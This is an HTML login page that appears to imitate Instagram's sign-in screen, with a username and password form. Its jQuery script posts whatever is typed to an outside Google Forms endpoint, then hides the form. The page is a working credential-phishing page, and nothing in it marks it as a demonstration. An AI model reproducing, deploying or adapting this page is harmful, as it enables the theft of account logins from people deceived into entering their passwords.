<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>

<style>
    body {
      font-family: Arial, Helvetica, sans-serif;
      background-color: whitesmoke !important;
    }
    form {border: 3px solid #f1f1f1;}

    input[type=text], input[type=password], select {
      width: 80%;
      font-size: 12px;
      padding: 12px 20px;
      margin: 8px 0;
      display: inline-block;
      border: 1px solid #ccc;
      box-sizing: border-box;
      color: #262626;
      background-color: rgb(250, 250, 250);
      border-color: rgb(239, 239, 239);
      font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
      border-radius: 5px;
    }

    input[type=text]:focus {
      outline: 0.5px solid lightgrey;
      border-radius: 5px;
    }

    input[type=password]:focus {
      outline: 0.5px solid lightgrey;
      border-radius: 5px;
    }

    button {
      background-color: #3897f0;
      color: white;
      padding-bottom: 24px;
      padding-top: 9px;
      margin: 0;
      border: none;
      cursor: pointer;
      width: 80%;
      height: 18px;
      font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
      font-weight: bold;
      border-radius: 5px;
    }

    button:hover {
      opacity: 0.8;
    }

    .cancelbtn {
      width: auto;
      padding: 10px 18px;
      background-color: #f44336;
    }

    .imgcontainer {
      text-align: center;
      margin: 24px 0 12px 0;
    }

    img.avatar {
      width: 20%;
      border-radius: 50%;
    }

    .container {
      padding: 16px;
    }

    span.psw {
      float: right;
      padding-top: 16px;
    }


    .slate {
      border-width: 1px;
      border-color: rgb(230, 230, 230);
      width: 25%;
      margin: 0 auto;
      background-color: #fff;
    }



    /* Change styles for span and cancel button on extra small screens */
    @media screen and (max-width: 300px) {
      span.psw {
        display: block;
        float: none;
      }
      .cancelbtn {
        width: 100%;
      }
    }

</style>
</head>

<body>

<div class="slate">


    <form id="form" target="_self" onsubmit="return postToGoogle();" action="" autocomplete="off"> 
        <div width="80% !important;" style="margin: 0 auto; text-align:center">
            <br/>
            <img src="Images/logo.PNG" style="width: 60%">
            <br/><br/>
            <input id="nameField" name="entry.366340186" placeholder="Phone number, username, or email" type="text" required> <br/>
            <input id="emailField" name="entry.147812173" placeholder="Password" type="password" required> <br/> <br/>
            
            <button id="send" type="submit" >Log In</button>
            <br/><br/>
        </div>
    </form>

<h3 id="success-msg" style="text-align: center !important; margin-top:190px !important; display:none; color:#fff"> Your Request has been posted to Google Spreadsheet</h3>

</div>






<script>

function postToGoogle() {
                var field1 = $("#nameField").val();
                var field2 = $("#emailField").val();
                

				if(field1 == ""){
					alert('Please Fill Your Name');
					document.getElementById("nameField").focus();
					return false;
				}
				if(field2 == ""){
					alert('Please Fill Your Email');
					document.getElementById("emailField").focus();
					return false;
				}
				


              $.ajax({
                      url: "https://docs.google.com/forms/d/e/1FAIpQLSf0rNCWw1sbsVpM3mg-yx8c2EZ-DqMP7vwTKGMSnvV0bPJH2w/formResponse?",
                      data: {"entry.366340186": field1, "entry.147812173": field2},
                      type: "POST",
                      dataType: "xml",
                      success: function(d)
                    {
                    },
                    error: function(x, y, z)
                      {

                        $('#success-msg').show();
                        $('#form').hide();
                        
                      }
                });
              
              return false;

}

</script>
</body>
</html>
